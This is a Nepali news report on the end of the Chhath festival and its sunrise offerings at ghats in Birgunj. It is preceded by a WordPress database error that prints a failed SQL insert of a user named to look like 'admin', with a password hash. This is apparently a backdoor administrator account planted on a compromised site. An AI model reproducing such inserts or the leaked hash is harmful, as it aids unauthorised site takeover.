WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCM2IgkuDk/QFDMV.5hlBXm4L.x3ah1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:13:01', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । प्रकृतिको पूजाअराधाना तथा एकता र सद्भावको सन्देश दिने छठ पर्व आज उदाउँदो सूर्यलाई व्रतालुले अघ्र्य अर्पण गरेपछि सम्पन्न भएको छ ।
चार दिन अघि नहाय खायबाट सुरु भएको छठ व्रतालुले उदाउँदो सूर्यलाई अघ्र्य अर्पण गरेपछि सम्पन्न भएको हो । कात्तिक शुक्लपञ्चमीका दिन रसियाव रोटी खाएर व्रतालुले सुरु गरेको ३६ घण्टे निर्जला व्रत उदाउँदो सूर्यलाई अघ्र्य अर्पणसँगै समापन भएको हो ।
वीरगञ्जको घडिअर्वा पोखरी, नगवा पोखरी, मुर्ली पोखरी, रानीघाट, छपकैया, इनर्वा, रामगढवा नगवा पोखरी, माइधिया पोखरीलगायतका स्थानमा बनाइएका छठघाटमा व्रतालुले बिहान सूर्यलाई अघ्र्य अर्पण गरेका थिए ।